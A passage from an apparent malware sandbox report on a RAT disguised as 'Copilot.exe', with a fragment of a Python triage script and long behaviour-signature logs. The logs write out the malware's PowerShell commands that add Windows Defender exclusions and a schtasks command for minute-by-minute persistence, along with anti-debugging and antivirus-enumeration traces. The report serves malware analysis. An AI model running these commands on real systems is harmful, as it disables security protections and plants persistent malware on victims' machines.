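            if e.get("delay_ms") == DOTNET_MAX_SLEEP_MS:
                detail = "infinite .NET sleep"
            else:
                detail = str(e.get("delay_ms", e.get("count")))
            findings.append((e["process"], "sleep-evasion", detail))
        elif is_sandbox_string(e):
            findings.append((e["process"], "sandbox-artifact", e["value"]))
    return findings


if __name__ == "__main__":
    for proc, tag, detail in triage(SAMPLE_EVENTS):
        print(f"{proc:<16} {tag:<18} {detail}")
```

The hosting check is the one worth a network-level block or a canned "false" answer in a sandbox: the sample decides on the single line ip-api.com returns, so serving it a non-hosting reply costs nothing and removes the gate. The infinite-sleep detection keys on the exact TimeSpan.MaxValue value rather than on "large", which keeps ordinary long timers out of the finding list.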

                    Anti Debugging

                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Code function: 1_2_00007FFAACB3764A CheckRemoteDebuggerPresent,1_2_00007FFAACB3764A
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process token adjusted: Debug (listed 2 times)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (listed 4 times)
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Process token adjusted: Debug (listed 2 times)
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Code function: 0_2_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_00401475
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe' (listed 4 times)
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe' (listed 3 times)
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Process created: C:\Users\user\AppData\Local\Temp\Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Copilot.exe"
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Copilot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (listed 2 times)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (listed 2 times)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Copilot.exe, 00000001.00000002.2513107629.000000001BB36000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2498539395.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2513107629.000000001BA78000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2498539395.0000000000E66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED
                    Source: Yara match | File source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: PixpFUv4G7.exe PID: 344, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Copilot.exe PID: 6488, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPED

                    Remote Access Functionality

                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED
                    Source: Yara match | File source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: PixpFUv4G7.exe PID: 344, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Copilot.exe PID: 6488, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPED

                    MITRE ATT&CK Matrix

                    The matrix is listed here one tactic per line; the number preceding a technique name is the report's signature count for that technique, techniques without a number are listed by the matrix without a matching signature.

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
